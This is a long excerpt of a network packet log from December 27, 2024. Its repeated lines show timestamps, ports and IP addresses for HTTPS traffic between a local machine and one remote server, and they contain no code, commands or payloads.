                                                                                                                                                                                            Dec 27, 2024 20:24:00.869692087 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.876269102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.876283884 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.876394033 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.876405954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.876477957 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.884155989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.884171963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.884251118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.884259939 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.884300947 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.892039061 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.892055988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.892134905 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.892146111 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.892190933 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.898849010 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.898866892 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.898946047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.898957968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.899003029 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.907203913 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.907219887 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.907298088 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.907310963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.907360077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.914197922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.914215088 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.914290905 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.914305925 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.914350033 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.921870947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.921890020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.921974897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:00.921983004 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:00.922027111 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.061448097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.061472893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.061536074 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.061552048 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.061599970 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.068314075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.068331003 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.068397045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.068408966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.068458080 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.076589108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.076606989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.076678991 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.076699018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.076742887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.084012032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.084031105 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.084105968 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.084119081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.084157944 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.091914892 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.091933966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.092010975 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.092044115 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.092097998 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.099623919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.099643946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.099723101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.099742889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.099795103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.106327057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.106344938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.106406927 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.106415987 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.106465101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.114119053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.114136934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.114227057 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.114237070 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.114289045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.256238937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.256266117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.256364107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.256377935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.256521940 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.261874914 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.261890888 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.261969090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.261977911 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.262023926 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.268269062 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.268287897 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.268362045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.268373966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.268419027 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.275965929 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.275984049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.276048899 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.276058912 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.276108980 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.283967018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.283982992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.284056902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.284075022 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.284116983 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.291248083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.291264057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.291332960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.291343927 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.291383982 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.298322916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.298338890 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.298412085 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.298422098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.298465014 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.305974960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.305990934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.306051016 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.306060076 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.306103945 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.445646048 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.445667028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.445869923 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.445893049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.445950031 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.452496052 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.452512980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.452593088 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.452603102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.452650070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.460416079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.460433006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.460503101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.460514069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.460563898 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.468166113 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.468183041 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.468296051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.468307972 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.468355894 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.475048065 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.475066900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.475142002 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.475157022 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.475200891 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.483392954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.483409882 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.483483076 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.483495951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.483540058 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.487447977 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.490247965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.490263939 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.490341902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.490351915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.490396976 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.498117924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.498136044 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.498219967 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.498233080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.498277903 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.560153961 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.637603998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.637626886 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.637722969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.637732029 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.637788057 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.645515919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.645534992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.645622015 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.645631075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.645692110 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.652328014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.652347088 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.652417898 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.652427912 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.652477980 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.660146952 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.660170078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.660223007 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.660231113 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.660280943 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.667916059 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.667934895 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.668000937 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.668020964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.668064117 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.675412893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.675429106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.675486088 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.675493956 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.675534010 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.683123112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.683140039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.683218002 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.683224916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.683269978 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.690016031 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.690032005 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.690098047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.690109968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.690154076 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.717499018 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.829791069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.829813004 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.829921961 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.829936981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.829988003 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.837378979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.837393999 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.837472916 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.837481976 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.837531090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.844297886 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.844314098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.844397068 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.844405890 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.844449997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.852138042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.852155924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.852231026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.852240086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.852279902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.859914064 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.859930992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.860032082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.860039949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.860090017 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.867265940 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.867284060 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.867369890 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.867379904 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.867445946 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.875191927 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.875209093 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.875348091 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.875358105 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.875405073 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.882184982 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.882203102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.882282972 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:01.882296085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:01.882345915 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.021517038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.021537066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.021621943 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.021639109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.021682024 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.029237032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.029252052 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.029333115 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.029341936 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.029390097 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.036921978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.036941051 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.037019014 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.037028074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.037074089 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.044846058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.044862032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.044939995 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.044955969 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.045011997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.052231073 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.052248001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.052330017 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.052350044 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.052424908 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.055253983 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.059089899 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.059106112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.059211016 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.059232950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.059292078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.066921949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.066939116 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.067028999 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.067064047 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.067126989 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.074836016 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.074856997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.074937105 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.074954987 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.075020075 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.213685989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.213705063 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.213788986 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.213825941 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.213881969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:24:02.221440077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.221457958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:24:02.221541882 CET49747443192.168.2.4172.67.208.58
